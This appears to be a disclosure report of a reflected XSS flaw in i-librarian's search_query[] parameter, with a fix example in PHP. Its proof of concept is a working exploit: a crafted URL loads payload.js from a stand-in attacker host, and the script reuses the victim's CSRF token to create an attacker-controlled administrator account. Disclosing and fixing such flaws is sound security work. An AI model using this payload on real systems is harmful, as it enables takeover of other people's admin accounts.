Reflected XSS at search_query[] query string in mkucej/i-librarian-free
Reported on
May 2nd 2023
Description
Reflected XSS (Cross-Site Scripting) occurs when a web application takes a value from the request, here the search keywords, and writes it back into the response without encoding it for the HTML context it lands in, so that attacker-supplied markup is parsed and executed by the victim's browser.
The search function lets users look for content on the website, and the search keywords are carried in the URL query string as search_query[]. Because the application neither validates nor encodes these values before placing them in the page, an attacker can inject HTML and JavaScript through them.
The attacker builds a URL whose search_query[] parameter contains a script tag (or other HTML) and delivers it to a victim, for example a logged-in administrator. When the victim opens the link, the application reflects the value into the page, the browser parses it as HTML, and the attacker's JavaScript runs in the victim's session on the i-librarian origin.
Proof of Concept
https://i-librarian.net/demo/index.php/#items/main?search_query%5B%5D=%3Cscript%20src%3D%22%2F%2Fattacker_host%2Fpayload.js%22%3E%3C%2Fscript%3E&search_boolean%5B%5D=AND&search_type%5B%5D=anywhere
# payload.js
// Served from attacker_host and loaded by the injected <script src="//attacker_host/payload.js"> tag.
// It runs in the victim's authenticated session on the i-librarian origin and creates a new user
// with administrator permissions (user[permissions]=A) bound to an attacker-controlled e-mail address.
function payload() {
  // csrfToken: global exposed by the application's page in the victim's session; it is appended
  // so the forged request passes the server-side CSRF check.
  const data = "user%5Busername%5D=&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Bemail%5D=attacker%40mail.com&user%5Bpermissions%5D=A&csrfToken=" + csrfToken;
  const xhr = new XMLHttpRequest();
  xhr.withCredentials = true; // send the victim's session cookie with the request
  xhr.addEventListener("readystatechange", function () {
    if (this.readyState === this.DONE) {
      alert(this.responseText); // surface the server's reply to the tester
    }
  });
  xhr.open("POST", "/index.php/users/create");
  // Headers kept from the browser capture of a legitimate user-creation request.
  xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; rv:112.0) Gecko/20100101 Firefox/112.0");
  xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("X-Client-Width", "1512");
  xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  xhr.setRequestHeader("Pragma", "no-cache");
  xhr.setRequestHeader("Cache-Control", "no-cache");
  // Forbidden request headers from the capture (Accept-Encoding, Origin, Referer, DNT, Connection,
  // Sec-Fetch-*, Sec-GPC) are omitted: XMLHttpRequest.setRequestHeader() silently ignores them and
  // the browser sets its own values on this same-origin request.
  xhr.send(data);
}
// Give the page time to finish loading (and to define csrfToken) before firing.
setTimeout(payload, 2000);
Impact
A successful reflected XSS attack runs attacker-controlled JavaScript in the victim's browser, inside the victim's authenticated session on the vulnerable origin. The consequences range from defacing the page and redirecting the victim to a malicious site, to reading data the victim can access, to performing actions on the victim's behalf without their knowledge.
The flaw also shows that user-controlled input reaches the page without output encoding, which damages trust in the site's overall security.
Preventing it requires encoding every reflected value for the HTML context it is written into, and checking the search function and the rest of the application for the same pattern.
In this application, an administrator who opens the crafted link while logged into the dashboard triggers the payload above without any further interaction: it reuses the page's CSRF token to POST to /index.php/users/create and creates an attacker-controlled account with administrator permissions, through which the attacker obtains a password with full admin rights. This is a significant risk and should be fixed promptly.
Occurrences
items.php L395
In the code, the values of $get['search_query'][$i] are embedded directly into an HTML tag through the html() method, with no validation or output encoding. A value that carries HTML or JavaScript is therefore parsed and executed by the victim's browser when the page is rendered, which is the reflected XSS shown in the proof of concept above.
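To make the vulnerable pattern and its fix concrete, the following is an added example, not code from i-librarian: it echoes search_query[] values into a search form first unencoded, as the report describes for items.php, and then with context-aware HTML encoding via htmlspecialchars(). The input-attribute context, the function names and the sample request are assumptions for illustration. The hardened version also drops non-string entries, because search_query[][]=x in PHP produces a nested array that string concatenation would otherwise coerce to the literal "Array" with a warning.

```php
<?php
// Added example, not i-librarian code. The search form markup, the
// function names and the sample request below are assumptions.

// Vulnerable: the reflected value is concatenated into the HTML unencoded,
// so a value such as <script src="//attacker_host/payload.js"></script>
// closes the attribute and is parsed as markup by the browser.
function render_search_vulnerable(array $get): string
{
    $html = '';
    foreach ($get['search_query'] ?? [] as $q) {
        $html .= '<input type="text" name="search_query[]" value="' . $q . '">' . "\n";
    }
    return $html;
}

// Hardened: every reflected value is encoded for the context it is written
// into. ENT_QUOTES escapes both quote styles so the value cannot break out
// of the attribute, ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string, and the is_string() check rejects nested
// arrays (search_query[][]=x) that PHP would otherwise coerce to "Array".
function render_search_fixed(array $get): string
{
    $html = '';
    foreach ($get['search_query'] ?? [] as $q) {
        if (!is_string($q)) {
            continue;
        }
        $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
        $html .= '<input type="text" name="search_query[]" value="' . $safe . '">' . "\n";
    }
    return $html;
}

// Constructed request mirroring the proof-of-concept URL: one malicious
// term, one ordinary term, and one nested array that a hostile client
// could send.
$get = [
    'search_query' => [
        '<script src="//attacker_host/payload.js"></script>',
        'machine learning',
        ['nested'],
    ],
];

echo "--- vulnerable ---\n", render_search_vulnerable($get);
echo "--- fixed ---\n", render_search_fixed($get);
```

Running the script shows the vulnerable output carrying a live script tag, while the fixed output renders the same term as inert text inside the attribute and omits the nested array entirely. The same encoding step must be applied at every point where search_query[] is written into HTML, not only at items.php L395.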